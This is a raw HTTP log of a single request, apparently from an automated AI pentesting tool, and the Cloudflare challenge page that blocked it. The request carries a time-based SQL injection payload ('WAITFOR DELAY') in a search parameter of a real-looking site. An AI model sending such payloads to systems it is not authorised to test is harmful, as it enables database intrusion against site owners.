REQUEST:
GET https://my.myfirst.tech/search?name=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9374
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847470948a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ggI3asujd4mwpRq8%2BbQiYl3Oe48W1sGYl9BFNO6euQKqQdj0PkF4bPSKS6QVymcFjEzXnUrX4m%2BHhV%2FnJ0NcBGCIclY11wOaHm5VEeG7DV2oq2UiEcCmIqbRaLLwa3bvukf6j0P3houYeSmcuQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847470948a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '2WFqAf6v6OtxlxoNR_.YLjWQ3lGdCd4AjjIaPW_BaNk-1784281155-1.2.1.1-fb4.TTV2HRHaaItpIkzd5rDxmhZQuju0TIN_o7haO1GYg6XhITDoRph5fP.eAas_',cITimeS: '1784281155',cRay: 'a1c847470948a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?name=1%29+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_tk=EASgMDKBk09Cyc4UexC7qeYqeWdbXpVSaxZerEv0yrg-1784281155-1.0.1.1-i.HSZaiQmuYEwYRO9xBRy5V5d510IDWikMxgHWsNKGs",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?name=1%29+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_f_tk=EASgMDKBk09Cyc4UexC7qeYqeWdbXpVSaxZerEv0yrg-1784281155-1.0.1.1-i.HSZaiQmuYEwYRO9xBRy5V5d510IDWikMxgHWsNKGs",md: 'eChHhGrJkv53visnwkkThKJorTEsZ97MzLqJLUO1i.I-1784281155-1.2.1.1-5hap.EVXmY66pPG4UgRWrWgmmlBfAMdTbQlhfx.EWu7Kb21Hujcji.2RzZC5DiBfP8kkwlntEN9IsieVt0_a_p542HQDNVwl5_CC9lYetjFoQ5yZsEA_22axhF7ApnRXNFpCCaLskbrC_D63z7o1EMF1qWDEix1OUQ9cpx1ko.9c_fjUL_ZfjqgLZJNOLrtCeuDuvlHRRc8pDRKTg4Vl11zg3dkvJdcla4Nn4.hk8BG24Ir6I8kU8HqIRqe8oPpohScMAl7XtIzQiQi2Eo7hf4T.5Gr7OYnwPSZSY83PW369e_nIHj_wdt3hC9sTgLSbxrr_V4izKRGkOVfbAOCyBL1beqXB.elvzsLpJfCuZ6yRiRDNkw19wk_h6Z9t3FaqNhHNfgLeQHWsz8ExuwPFkQ_EXoH7tt8uMWTOQOkh.gfEwvcs7aZIM3RAbeDga..bnA1lPGJztkJZMLFNu7SIsW1_4bzOyOvNR_eViFMrqQV30bARpBj0nKa60B0fvni3vqwf6uvTeDG5MklT_BEV6csZUA.wpzE7cmikQ5xuMvxjh0AWu.lGJnQV2b1GyLyi.NjZcQ0efN.RG3at0rwwuSVhaMobpxFOePRqou4IKXLnBnz.oNgMBWXKPQ_9imrPbB6V0LfaeJHVPJxjaBoE6fX8dwG_LC72yxZ8eWd9T6PVCGuxpt7dzMijgqe2e.oIp1LVSaZgUw_H.6Q.7nM65Hmwl3qtsMQ_g1jcNOSGY9GyjB3WeNir0.NPkuQ4.x5sBG2CeXj8Pfbz_qHzE0T0bfCgWbxl52.pTKa1c1FiVPTAm1nWZQ5UTb8Q8XV8GgzdGGU2obizpDajhWeu2QbwX1q_r0.d6nMOzi3Qs4.zNrpt4slDIjowCtGJGONWL7aPc4xDh...mNFRpLUMN_2zRIuRxEvT6GCGq.NAehi30_TXxTN5pA3iKFHwMBzojdgkA6pg2V2JFsfKC.IvysYoFp_Aon5gwhXEXGe2g_9M82BxqXzdUzM8z_EkNwuHmsaebvFn4zsW1i.lvU5cTGJlv6cY64PUpsGd9dYrIDXaOK05m6ca3fIt81ii1R4j9PofDq0RlQgJRqw15h2hgP2DRM0S8pVL5A87zgSk4zDfUYG0vEkgr2aODWXLNJOYUR7DWXx7C668z3S5nrRLdP5wcy8tIp9ayzMnMJqlv9Zc1IYpyKtzR0croITtI3e.uqR3',mdrd: 'G8enkw76NWNwErgKGfwm79oRA3aw4Fo_bHvDz2j36.k-1784281155-1.2.1.1-lgu6P9vFzaEh181Pg9A_fuitv7sdz_86wYQYKlAlTaogY6cjIEX0u20FYlfLEb1lIT9S3B.sEYpQpAL8dFdafaJLxFYfppkmeHgoCAFdbPsDZxOsJQmnzy3XzNIxWMUiRB3KP6xBkxfkfgBQyPXokvpADNtrzGc_UEKXW3tYYGdA.oQJD.sguvMcez2vdm97cbLWh6lqnb9TEHGmcn_R9sPGPtQfjKXoP9qrsebI832gSgC6FvYJOjh_Ibw53kvw',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847470948a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?name=1%29+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_rt_tk=EASgMDKBk09Cyc4UexC7qeYqeWdbXpVSaxZerEv0yrg-1784281155-1.0.1.1-i.HSZaiQmuYEwYRO9xBRy5V5d510IDWikMxgHWsNKGs"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
